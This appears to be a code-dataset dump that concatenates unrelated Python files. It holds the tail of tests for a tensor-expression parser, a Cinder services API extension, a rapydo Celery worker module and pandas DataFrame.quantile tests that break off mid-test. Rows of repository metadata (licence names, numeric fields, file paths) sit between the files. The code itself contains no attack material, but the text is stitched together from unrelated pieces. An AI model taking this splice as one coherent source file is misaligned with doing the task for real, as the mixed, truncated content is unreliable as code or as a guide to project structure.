def test_derivative0(self): self.assert_ast('(2 ?arg + 1)_,?arg', '', ('derivative', ('group', ('add', ('mul', _(2), ('arg', _('arg'))), _(1))), ('arg', _('arg'))))
def test_derivative1(self): self.assert_ast('(a2_i + ?arg_i)_,?arg_j', 'ij', ('derivative', ('group', ('add', v._a2, ('arg', _('arg'), _(2)))), ('arg', _('arg'), _(2))))
def test_derivative2(self): self.assert_ast('(a23_ij + ?arg_ij)_,?arg_kj', 'ik', ('trace', ('derivative', ('group', ('add', v._a23, ('arg', _('arg'), _(2), _(3)))), ('arg', _('arg'), _(2), _(3))), _(1), _(3)))
# NEW DERIVATIVE
def test_newderivative0(self): self.assert_ast('d?arg:(2 ?arg + 1)', '', ('derivative', ('group', ('add', ('mul', _(2), ('arg', _('arg'))), _(1))), ('arg', _('arg'))))
def test_newderivative1(self): self.assert_ast('d?arg_j:(a2_i + ?arg_i)', 'ij', ('derivative', ('group', ('add', v._a2, ('arg', _('arg'), _(2)))), ('arg', _('arg'), _(2))))
def test_newderivative2(self): self.assert_ast('d?arg_kj:(a23_ij + ?arg_ij)', 'ik', ('trace', ('derivative', ('group', ('add', v._a23, ('arg', _('arg'), _(2), _(3)))), ('arg', _('arg'), _(2), _(3))), _(1), _(3)))
# NORMAL
def test_normal(self): self.assert_ast('n:x_i', 'i', ('normal', v._x))
def test_normal_default(self): self.assert_ast('n_i', 'i', ('normal', v._x))
def test_normal_altgeom(self): self.assert_ast('n_altgeom_i', 'i', ('normal', v._altgeom))
def test_normal_default_grad_default(self): self.assert_ast('n_i,j', 'ij', ('grad', ('normal', v._x), v._x))
def test_normal_altgeom_grad_default(self): self.assert_ast('n_altgeom_i,x_j', 'ij', ('grad', ('normal', v._altgeom), v._x))
def test_normal_altgeom_grad_altgeom(self): self.assert_ast('n_altgeom_i,altgeom_j', 'ij', ('grad', ('normal', v._altgeom), v._altgeom))
def test_normal_altgeom_grad_nogeom(self):
self.assert_syntax_error(
"Missing geometry, e.g. ',altgeom_i' or ',x_i'.",
"1 + n_altgeom_i,i + 1", "",
" ^")
def test_normal_missing_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 0.",
"1 + n + 1", "",
" ^")
def test_normal_too_many_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"1 + n_ij + 1", "",
" ^^^^")
def test_normal_invalid_geom_0dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a' has 0.",
"1 + n_a_i + 1", "",
" ^^^^")
def test_normal_invalid_geom_2dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a22' has 2.",
"1 + n_a22_i + 1", "",
" ^^^^^^")
def test_variable_startswith_normal(self):
nx = Array('nx', [2])
self.assert_ast('nx_i', 'i', _(nx), variables=dict(nx=nx))
# JACOBIAN
def test_jacobian(self): self.assert_ast('J:x', '', ('jacobian', v._x, _(2)))
def test_jacobian_boundary(self): self.assert_ast('J^:x', '', ('jacobian', v._x, _(1)))
def test_jacobian_double_boundary(self): self.assert_ast('J^^:x', '', ('jacobian', v._x, _(0)))
def test_old_jacobian(self): self.assert_ast('d:x', '', ('jacobian', v._x, _(None)))
# VARIABLE LENGTH TESTS
def test_variable_lengths_shape_mismatch1(self):
self.assert_syntax_error(
"Axes have different lengths: 2, 3.",
"aXY_ii + aX2_ii + aY3_ii", "",
"^^^^^^^^^^^^^^^^^^^^^^^^")
def test_variable_lengths_shape_mismatch2(self):
self.assert_syntax_error(
"Shapes at index 'j' differ: 2, 3.",
"aX2X3_iijj", "",
"^^^^^^^^^^")
# FIXED LENGTHS
def test_fixed_lengths(self): self.assert_ast('δ_ij', 'ij', ('eye', _(3)), fixed_lengths=dict(i=3))
def test_fixed_lengths_invalid(self):
self.assert_syntax_error(
'Length of index i is fixed at 3 but the expression has length 2.',
'a2_i', 'i',
' ^',
fixed_lengths=dict(i=3))
def test_fixed_lengths_invalid_linked(self):
self.assert_syntax_error(
'Axes have different lengths: 2, 3.',
'a2_i δ_ij', 'j',
'^^^^^^^^^',
fixed_lengths=dict(j=3))
# FALLBACK LENGHT
def test_fallback_length(self): self.assert_ast('1_i', 'i', ('append_axis', _(1), _(2)), fallback_length=2)
# ARG
def test_arg0(self): self.assert_ast('a ?coeffs', '', ('mul', v._a, ('arg', _('coeffs'))))
def test_arg1(self): self.assert_ast('a2_i ?coeffs_i', '', ('sum', ('mul', v._a2, ('arg', _('coeffs'), _(2))), _(0)))
def test_arg2(self): self.assert_ast('a23_ij ?coeffs_ij', '', ('sum', ('sum', ('mul', v._a23, ('arg', _('coeffs'), _(2), _(3))), _(1)), _(0)))
def test_arg_reshape(self):
self.assert_syntax_error(
"Argument 'arg' previously defined with 1 axis instead of 2.",
"a2_i (a2_j + ?arg_j) + ?arg_ij", "ij",
" ^^^^^^^")
def test_arg_shape_mismatch(self):
self.assert_syntax_error(
"Axes have different lengths: 2, 3.",
"1 + a2_i ?arg_i + a3_j ?arg_j + 1", "",
"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
def test_arg_reshape_external(self):
self.assert_syntax_error(
"Argument 'arg' previously defined with 2 axes instead of 1.",
"1 + a3_j ?arg_j + 1", "",
" ^^^^^^",
{'arg': (2,3)})
def test_arg_shape_mismatch_external(self):
self.assert_syntax_error(
"Shapes at index 'j' differ: 3, 2.",
"1 + a3_j ?arg_j + 1", "",
" ^^^^^^^^^^^",
{'arg': (2,)})
def test_arg_index_pos1(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"?arg_n", "n",
" ^")
def test_arg_index_pos2(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"?foo_,?bar_n", "n",
" ^")
# SUBSTITUTE
def test_arg_subs_0d_const(self): self.assert_ast('?arg_,?arg(arg=1)', '', ('substitute', ('derivative', ('arg', _('arg')), ('arg', _('arg'))), ('arg', _('arg')), _(1)))
def test_arg_subs_0d_var(self): self.assert_ast('?arg_,?arg(arg=a )', '', ('substitute', ('derivative', ('arg', _('arg')), ('arg', _('arg'))), ('arg', _('arg')), v._a))
def test_arg_subs_1d_var(self): self.assert_ast('?arg_i,?arg_j(arg_i = a2_i)', 'ij', ('substitute', ('derivative', ('arg', _('arg'), _(2)), ('arg', _('arg'), _(2))), ('arg', _('arg'), _(2)), v._a2))
def test_arg_subs_2d_var(self): self.assert_ast('?arg_ij,?arg_kl( arg_ij =a23_ji)', 'ijkl', ('substitute', ('derivative', ('arg', _('arg'), _(3), _(2)), ('arg', _('arg'), _(3), _(2))), ('arg', _('arg'), _(3), _(2)), ('transpose', v._a23, _((1,0)))))
def test_arg_multisubs(self): self.assert_ast('(1 + ?x + ?y)(x=1 + a, y=2)', '', ('substitute', ('group', ('add', ('add', _(1), ('arg', _('x'))), ('arg', _('y')))), ('arg', _('x')), ('add', _(1), v._a), ('arg', _('y')), _(2)))
def test_arg_subs_missing_equals(self):
self.assert_syntax_error(
"Expected '='.",
"(1 + ?x)(x + 2)", "",
" ^")
def test_arg_subs_unmatched_indices(self):
self.assert_syntax_error(
"Left and right hand side should have the same indices, got 'kl' and 'jk'.",
"a23_ij + ?x_ij(x_kl=a23_jk) + a23_ij", "ij",
" ^^^^^^^^^^^")
def test_arg_subs_lhs_repeated_index(self):
self.assert_syntax_error(
"Repeated indices are not allowed on the left hand side.",
"a23_ij + ?x_ij(x_kk=a23_jk) + 2", "ij",
" ^^^^")
def test_arg_subs_lhs_numeric_index(self):
self.assert_syntax_error(
"Numeric indices are not allowed on the left hand side.",
"a23_ij + ?x_ij(x_k0=a23_0k) + 2", "ij",
" ^^^^")
def test_arg_subs_lhs_with_questionmark(self):
self.assert_syntax_error(
"The argument name at the left hand side of a substitution must not be prefixed by a '?'.",
"?x_ij(?x_ij=1_ij)", "ij",
" ^^^")
def test_arg_subs_lhs_not_an_argument(self):
self.assert_syntax_error(
"Expected an argument, e.g. 'argname'.",
"?x(1=2)", "",
" ^")
def test_arg_subs_double_occurence(self):
self.assert_syntax_error(
"Argument 'x' occurs more than once.",
"?x(x=1, x=2)", "",
" ^")
def test_arg_subs_zero(self):
self.assert_syntax_error(
"Zero substitutions are not allowed.",
"?x_ij()", "ij",
"^^^^^^^")
# TRANSPOSE
def test_transpose_duplicate_indices(self):
self.assert_syntax_error(
"Cannot transpose from 'ij' to 'jii': duplicate indices.",
"a23_ij", "jii",
"^^^^^^")
def test_transpose_indices_differ(self):
self.assert_syntax_error(
"Cannot transpose from 'ij' to 'jk': indices differ.",
"a23_ij", "jk",
"^^^^^^")
# STACK
def test_stack_1_0d(self): self.assert_ast('<a>_i', 'i', ('append_axis', v._a, _(1)))
def test_stack_1_1di_1(self): self.assert_ast('<a2_i>_i', 'i', v._a2)
def test_stack_2_0d_0d(self): self.assert_ast('<a, a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_2_1di_0d(self): self.assert_ast('<a2_i, a>_i', 'i', ('concatenate', v._a2, ('append_axis', v._a, _(1))))
def test_stack_3_2di_1d_1d(self): self.assert_ast('<a23_ij, a3_j, 1_j>_i', 'ij', ('concatenate', v._a23, ('transpose', ('append_axis', v._a3, _(1)), _((1,0))), ('transpose', ('append_axis', ('append_axis', _(1), _(3)), _(1)), _((1,0)))))
def test_stack_no_indices(self):
self.assert_syntax_error(
"Expected 1 index.",
"<1, a2_i> + a3_i", "i",
" ^")
def test_stack_too_many_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"<1, a2_i>_ij + a3_i", "i",
" ^^")
def test_stack_numeric_index(self):
self.assert_syntax_error(
"Expected a non-numeric index, got '1'.",
"<1, a2_i>_1 + a3_i", "i",
" ^")
def test_stack_0(self):
self.assert_syntax_error(
"Cannot stack 0 arrays.",
"1_i + <>_i + 1_i", "i",
" ^^^^")
def test_stack_unmatched_indices(self):
self.assert_syntax_error(
"Cannot stack arrays with unmatched indices (excluding the stack index 'i'): j, ijk.",
"1_ij + <a2_j, a222_ijk>_i + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^")
def test_stack_undetermined_length(self):
self.assert_syntax_error(
"Cannot determine the length of the stack axis, because the length at 12 is unknown.",
"1_i + <a, 1_i>_i + 1_i", "i",
" ^")
def test_stack_whitespace_left(self): self.assert_ast('< a, a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_whitespace_right(self): self.assert_ast('<a, a >_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_whitespace_before_comma(self): self.assert_ast('<a , a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
# FIXME: the following should work
# 'a2_j a2_i + <0j, δ_ij>_i'
# FUNCTION
def test_function_0d(self): self.assert_ast('func1(a)', '', ('call', _('func1'), v._a))
def test_function_1d(self): self.assert_ast('func1(a2_i)', 'i', ('call', _('func1'), v._a2))
def test_function_2d(self): self.assert_ast('func1(a23_ij)', 'ij', ('call', _('func1'), v._a23))
def test_function_0d_0d(self): self.assert_ast('func2(a, a)', '', ('call', _('func2'), v._a, v._a))
def test_function_1d_1d(self): self.assert_ast('func2(a2_i, a2_i)', 'i', ('call', _('func2'), v._a2, v._a2))
def test_function_2d_2d(self): self.assert_ast('func2(a23_ij, a32_ji)', 'ij', ('call', _('func2'), v._a23, ('transpose', v._a32, _((1,0)))))
def test_function_2d_2d_2d(self): self.assert_ast('func3(a23_ij, a22_ik a23_kj, a23_ij)', 'ij', ('call', _('func3'), v._a23, ('sum', ('mul', ('append_axis', v._a22, _(3)), ('transpose', ('append_axis', v._a23, _(2)), _((2,0,1)))), _(1)), v._a23))
def test_function_invalid_nargs(self):
self.assert_syntax_error(
"Function 'func1' takes 1 argument, got 2.",
"1 + func1(a, a) + 1", "",
" ^^^^^^^^^^^")
def test_function_unmatched_indices(self):
self.assert_syntax_error(
"Cannot align arrays with unmatched indices: ij, ij, jk.",
"1_ij + func3(a23_ij, a23_ij, a23_jk) + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
def test_function_unmatched_shape(self):
self.assert_syntax_error(
"Shapes at index 'i' differ: 2, 3.",
"1_ij + func2(a23_ij, a33_ij) + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^^^^")
def test_function_unknown(self):
self.assert_syntax_error(
"Unknown variable: 'funcX'.",
"1_ij + funcX(a23_ij) + 1_ij", "ij",
" ^^^^^")
def test_function_override(self):
self.assert_syntax_error(
"Expected '='.",
"1_ij + funcoverride(a23_ij) + 1_ij", "ij",
" ^")
# vim:shiftwidth=2:softtabstop=2:expandtab:foldmethod=indent:foldnestmax=2
| mit | 120,612,330,898,262,830 | 35.829517 | 251 | 0.526392 | false |
github-borat/cinder | cinder/api/contrib/services.py | 1 | 7120 | # Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import webob.exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder.api import xmlutil
from cinder import db
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('volume', 'services')
class ServicesIndexTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('services')
elem = xmlutil.SubTemplateElement(root, 'service', selector='services')
elem.set('binary')
elem.set('host')
elem.set('zone')
elem.set('status')
elem.set('state')
elem.set('update_at')
elem.set('disabled_reason')
return xmlutil.MasterTemplate(root, 1)
class ServicesUpdateTemplate(xmlutil.TemplateBuilder):
def construct(self):
# TODO(uni): template elements of 'host', 'service' and 'disabled'
# should be deprecated to make ServicesUpdateTemplate consistent
# with ServicesIndexTemplate. Still keeping it here for API
# compatibility sake.
root = xmlutil.TemplateElement('host')
root.set('host')
root.set('service')
root.set('disabled')
root.set('binary')
root.set('status')
root.set('disabled_reason')
return xmlutil.MasterTemplate(root, 1)
class ServiceController(wsgi.Controller):
def __init__(self, ext_mgr=None):
self.ext_mgr = ext_mgr
super(ServiceController, self).__init__()
@wsgi.serializers(xml=ServicesIndexTemplate)
def index(self, req):
"""Return a list of all running services.
Filter by host & service name.
"""
context = req.environ['cinder.context']
authorize(context)
detailed = self.ext_mgr.is_loaded('os-extended-services')
now = timeutils.utcnow()
services = db.service_get_all(context)
host = ''
if 'host' in req.GET:
host = req.GET['host']
service = ''
if 'service' in req.GET:
service = req.GET['service']
LOG.deprecated(_("Query by service parameter is deprecated. "
"Please use binary parameter instead."))
binary = ''
if 'binary' in req.GET:
binary = req.GET['binary']
if host:
services = [s for s in services if s['host'] == host]
# NOTE(uni): deprecating service request key, binary takes precedence
binary_key = binary or service
if binary_key:
services = [s for s in services if s['binary'] == binary_key]
svcs = []
for svc in services:
delta = now - (svc['updated_at'] or svc['created_at'])
alive = abs(utils.total_seconds(delta)) <= CONF.service_down_time
art = (alive and "up") or "down"
active = 'enabled'
if svc['disabled']:
active = 'disabled'
ret_fields = {'binary': svc['binary'], 'host': svc['host'],
'zone': svc['availability_zone'],
'status': active, 'state': art,
'updated_at': svc['updated_at']}
if detailed:
ret_fields['disabled_reason'] = svc['disabled_reason']
svcs.append(ret_fields)
return {'services': svcs}
def _is_valid_as_reason(self, reason):
if not reason:
return False
try:
utils.check_string_length(reason.strip(), 'Disabled reason',
min_length=1, max_length=255)
except exception.InvalidInput:
return False
return True
@wsgi.serializers(xml=ServicesUpdateTemplate)
def update(self, req, id, body):
"""Enable/Disable scheduling for a service."""
context = req.environ['cinder.context']
authorize(context)
ext_loaded = self.ext_mgr.is_loaded('os-extended-services')
ret_val = {}
if id == "enable":
disabled = False
status = "enabled"
if ext_loaded:
ret_val['disabled_reason'] = None
elif (id == "disable" or
(id == "disable-log-reason" and ext_loaded)):
disabled = True
status = "disabled"
else:
raise webob.exc.HTTPNotFound(explanation=_("Unknown action"))
try:
host = body['host']
except (TypeError, KeyError):
raise webob.exc.HTTPBadRequest()
ret_val['disabled'] = disabled
if id == "disable-log-reason" and ext_loaded:
reason = body.get('disabled_reason')
if not self._is_valid_as_reason(reason):
msg = _('Disabled reason contains invalid characters '
'or is too long')
raise webob.exc.HTTPBadRequest(explanation=msg)
ret_val['disabled_reason'] = reason
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
service = body.get('service', '')
binary = body.get('binary', '')
binary_key = binary or service
if not binary_key:
raise webob.exc.HTTPBadRequest()
try:
svc = db.service_get_by_args(context, host, binary_key)
if not svc:
raise webob.exc.HTTPNotFound(explanation=_('Unknown service'))
db.service_update(context, svc['id'], ret_val)
except exception.ServiceNotFound:
raise webob.exc.HTTPNotFound(explanation=_("service not found"))
ret_val.update({'host': host, 'service': service,
'binary': binary, 'status': status})
return ret_val
class Services(extensions.ExtensionDescriptor):
"""Services support."""
name = "Services"
alias = "os-services"
namespace = "http://docs.openstack.org/volume/ext/services/api/v2"
updated = "2012-10-28T00:00:00-00:00"
def get_resources(self):
resources = []
controller = ServiceController(self.ext_mgr)
resource = extensions.ResourceExtension('os-services', controller)
resources.append(resource)
return resources
| apache-2.0 | 4,511,568,825,888,255,000 | 34.247525 | 79 | 0.597051 | false |
EUDAT-B2STAGE/http-api-base | old_stuff/rapydo/services/celery/worker.py | 1 | 1165 | # -*- coding: utf-8 -*-
"""
Celery pattern. Some interesting read here:
http://blog.miguelgrinberg.com/post/celery-and-the-flask-application-factory-pattern
Of course that discussion is not enough for
a flask templating framework like ours.
So we made some improvement along the code.
"""
from rapydo.server import create_app
from rapydo.services.celery.celery import celery_app
from rapydo.utils.meta import Meta
from rapydo.utils.logs import get_logger
log = get_logger(__name__)
################################################
# Reload Flask app code also for the worker
# This is necessary to have the app context available
app = create_app(worker_mode=True, debug=True)
# Recover celery app with current app
# celery_app = MyCelery(app)._current
# celery_app = MyCelery(app)._current
log.debug("Celery %s" % celery_app)
################################################
# Import tasks modules to make sure all tasks are avaiable
meta = Meta()
main_package = "commons.tasks."
# Base tasks
submodules = meta.import_submodules_from_package(main_package + "base")
# Custom tasks
submodules = meta.import_submodules_from_package(main_package + "custom")
| mit | 2,851,370,823,037,356,000 | 28.125 | 84 | 0.693562 | false |
jreback/pandas | pandas/tests/frame/methods/test_quantile.py | 1 | 18264 | import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Series, Timestamp
import pandas._testing as tm
class TestDataFrameQuantile:
@pytest.mark.parametrize(
"df,expected",
[
[
DataFrame(
{
0: Series(pd.arrays.SparseArray([1, 2])),
1: Series(pd.arrays.SparseArray([3, 4])),
}
),
Series([1.5, 3.5], name=0.5),
],
[
DataFrame(Series([0.0, None, 1.0, 2.0], dtype="Sparse[float]")),
Series([1.0], name=0.5),
],
],
)
def test_quantile_sparse(self, df, expected):
# GH#17198
# GH#24600
result = df.quantile()
tm.assert_series_equal(result, expected)
def test_quantile(self, datetime_frame):
from numpy import percentile
df = datetime_frame
q = df.quantile(0.1, axis=0)
assert q["A"] == percentile(df["A"], 10)
tm.assert_index_equal(q.index, df.columns)
q = df.quantile(0.9, axis=1)
assert q["2000-01-17"] == percentile(df.loc["2000-01-17"], 90)
tm.assert_index_equal(q.index, df.index)
# test degenerate case
q = DataFrame({"x": [], "y": []}).quantile(0.1, axis=0)
assert np.isnan(q["x"]) and np.isnan(q["y"])
# non-numeric exclusion
df = DataFrame({"col1": ["A", "A", "B", "B"], "col2": [1, 2, 3, 4]})
rs = df.quantile(0.5)
xp = df.median().rename(0.5)
tm.assert_series_equal(rs, xp)
# axis
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
result = df.quantile([0.5, 0.75], axis=1)
expected = DataFrame(
{1: [1.5, 1.75], 2: [2.5, 2.75], 3: [3.5, 3.75]}, index=[0.5, 0.75]
)
tm.assert_frame_equal(result, expected, check_index_type=True)
# We may want to break API in the future to change this
# so that we exclude non-numeric along the same axis
# See GH #7312
df = DataFrame([[1, 2, 3], ["a", "b", 4]])
result = df.quantile(0.5, axis=1)
expected = Series([3.0, 4.0], index=[0, 1], name=0.5)
tm.assert_series_equal(result, expected)
def test_quantile_date_range(self):
# GH 2460
dti = pd.date_range("2016-01-01", periods=3, tz="US/Pacific")
ser = Series(dti)
df = DataFrame(ser)
result = df.quantile(numeric_only=False)
expected = Series(
["2016-01-02 00:00:00"], name=0.5, dtype="datetime64[ns, US/Pacific]"
)
tm.assert_series_equal(result, expected)
def test_quantile_axis_mixed(self):
# mixed on axis=1
df = DataFrame(
{
"A": [1, 2, 3],
"B": [2.0, 3.0, 4.0],
"C": pd.date_range("20130101", periods=3),
"D": ["foo", "bar", "baz"],
}
)
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], name=0.5)
tm.assert_series_equal(result, expected)
# must raise
msg = "'<' not supported between instances of 'Timestamp' and 'float'"
with pytest.raises(TypeError, match=msg):
df.quantile(0.5, axis=1, numeric_only=False)
def test_quantile_axis_parameter(self):
# GH 9543/9544
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=0)
expected = Series([2.0, 3.0], index=["A", "B"], name=0.5)
tm.assert_series_equal(result, expected)
expected = df.quantile(0.5, axis="index")
tm.assert_series_equal(result, expected)
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
result = df.quantile(0.5, axis="columns")
tm.assert_series_equal(result, expected)
msg = "No axis named -1 for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.quantile(0.1, axis=-1)
msg = "No axis named column for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.quantile(0.1, axis="column")
def test_quantile_interpolation(self):
# see gh-10174
# interpolation method other than default linear
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1, interpolation="nearest")
expected = Series([1, 2, 3], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
# cross-check interpolation=nearest results in original dtype
exp = np.percentile(
np.array([[1, 2, 3], [2, 3, 4]]), 0.5, axis=0, interpolation="nearest"
)
expected = Series(exp, index=[1, 2, 3], name=0.5, dtype="int64")
tm.assert_series_equal(result, expected)
# float
df = DataFrame({"A": [1.0, 2.0, 3.0], "B": [2.0, 3.0, 4.0]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1, interpolation="nearest")
expected = Series([1.0, 2.0, 3.0], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
exp = np.percentile(
np.array([[1.0, 2.0, 3.0], [2.0, 3.0, 4.0]]),
0.5,
axis=0,
interpolation="nearest",
)
expected = Series(exp, index=[1, 2, 3], name=0.5, dtype="float64")
tm.assert_series_equal(result, expected)
# axis
result = df.quantile([0.5, 0.75], axis=1, interpolation="lower")
expected = DataFrame(
{1: [1.0, 1.0], 2: [2.0, 2.0], 3: [3.0, 3.0]}, index=[0.5, 0.75]
)
tm.assert_frame_equal(result, expected)
# test degenerate case
df = DataFrame({"x": [], "y": []})
q = df.quantile(0.1, axis=0, interpolation="higher")
assert np.isnan(q["x"]) and np.isnan(q["y"])
# multi
df = DataFrame([[1, 1, 1], [2, 2, 2], [3, 3, 3]], columns=["a", "b", "c"])
result = df.quantile([0.25, 0.5], interpolation="midpoint")
# https://github.com/numpy/numpy/issues/7163
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]],
index=[0.25, 0.5],
columns=["a", "b", "c"],
)
tm.assert_frame_equal(result, expected)
def test_quantile_interpolation_datetime(self, datetime_frame):
# see gh-10174
# interpolation = linear (default case)
df = datetime_frame
q = df.quantile(0.1, axis=0, interpolation="linear")
assert q["A"] == np.percentile(df["A"], 10)
def test_quantile_interpolation_int(self, int_frame):
# see gh-10174
df = int_frame
# interpolation = linear (default case)
q = df.quantile(0.1)
assert q["A"] == np.percentile(df["A"], 10)
# test with and without interpolation keyword
q1 = df.quantile(0.1, axis=0, interpolation="linear")
assert q1["A"] == np.percentile(df["A"], 10)
tm.assert_series_equal(q, q1)
def test_quantile_multi(self):
df = DataFrame([[1, 1, 1], [2, 2, 2], [3, 3, 3]], columns=["a", "b", "c"])
result = df.quantile([0.25, 0.5])
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]],
index=[0.25, 0.5],
columns=["a", "b", "c"],
)
tm.assert_frame_equal(result, expected)
# axis = 1
result = df.quantile([0.25, 0.5], axis=1)
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]], index=[0.25, 0.5], columns=[0, 1, 2]
)
# empty
result = DataFrame({"x": [], "y": []}).quantile([0.1, 0.9], axis=0)
expected = DataFrame(
{"x": [np.nan, np.nan], "y": [np.nan, np.nan]}, index=[0.1, 0.9]
)
tm.assert_frame_equal(result, expected)
def test_quantile_datetime(self):
df = DataFrame({"a": pd.to_datetime(["2010", "2011"]), "b": [0, 5]})
# exclude datetime
result = df.quantile(0.5)
expected = Series([2.5], index=["b"])
# datetime
result = df.quantile(0.5, numeric_only=False)
expected = Series(
[Timestamp("2010-07-02 12:00:00"), 2.5], index=["a", "b"], name=0.5
)
tm.assert_series_equal(result, expected)
# datetime w/ multi
result = df.quantile([0.5], numeric_only=False)
expected = DataFrame(
[[Timestamp("2010-07-02 12:00:00"), 2.5]], index=[0.5], columns=["a", "b"]
)
tm.assert_frame_equal(result, expected)
# axis = 1
df["c"] = pd.to_datetime(["2011", "2012"])
result = df[["a", "c"]].quantile(0.5, axis=1, numeric_only=False)
expected = Series(
[Timestamp("2010-07-02 12:00:00"), Timestamp("2011-07-02 12:00:00")],
index=[0, 1],
name=0.5,
)
tm.assert_series_equal(result, expected)
result = df[["a", "c"]].quantile([0.5], axis=1, numeric_only=False)
expected = DataFrame(
[[Timestamp("2010-07-02 12:00:00"), Timestamp("2011-07-02 12:00:00")]],
index=[0.5],
columns=[0, 1],
)
tm.assert_frame_equal(result, expected)
# empty when numeric_only=True
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# result = df[['a', 'c']].quantile(.5)
# result = df[['a', 'c']].quantile([.5])
def test_quantile_invalid(self, datetime_frame):
msg = "percentiles should all be in the interval \\[0, 1\\]"
for invalid in [-1, 2, [0.5, -1], [0.5, 2]]:
with pytest.raises(ValueError, match=msg):
datetime_frame.quantile(invalid)
def test_quantile_box(self):
df = DataFrame(
{
"A": [
Timestamp("2011-01-01"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
],
"B": [
Timestamp("2011-01-01", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-03", tz="US/Eastern"),
],
"C": [
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
],
}
)
res = df.quantile(0.5, numeric_only=False)
exp = Series(
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
],
name=0.5,
index=["A", "B", "C"],
)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
]
],
index=[0.5],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(res, exp)
# DatetimeBlock may be consolidated and contain NaT in different loc
df = DataFrame(
{
"A": [
Timestamp("2011-01-01"),
pd.NaT,
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
],
"a": [
Timestamp("2011-01-01"),
Timestamp("2011-01-02"),
pd.NaT,
Timestamp("2011-01-03"),
],
"B": [
Timestamp("2011-01-01", tz="US/Eastern"),
pd.NaT,
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-03", tz="US/Eastern"),
],
"b": [
Timestamp("2011-01-01", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.NaT,
Timestamp("2011-01-03", tz="US/Eastern"),
],
"C": [
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
pd.NaT,
],
"c": [
pd.NaT,
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
],
},
columns=list("AaBbCc"),
)
res = df.quantile(0.5, numeric_only=False)
exp = Series(
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
pd.Timedelta("2 days"),
],
name=0.5,
index=list("AaBbCc"),
)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
pd.Timedelta("2 days"),
]
],
index=[0.5],
columns=list("AaBbCc"),
)
tm.assert_frame_equal(res, exp)
def test_quantile_nan(self):
# GH 14357 - float block where some cols have missing values
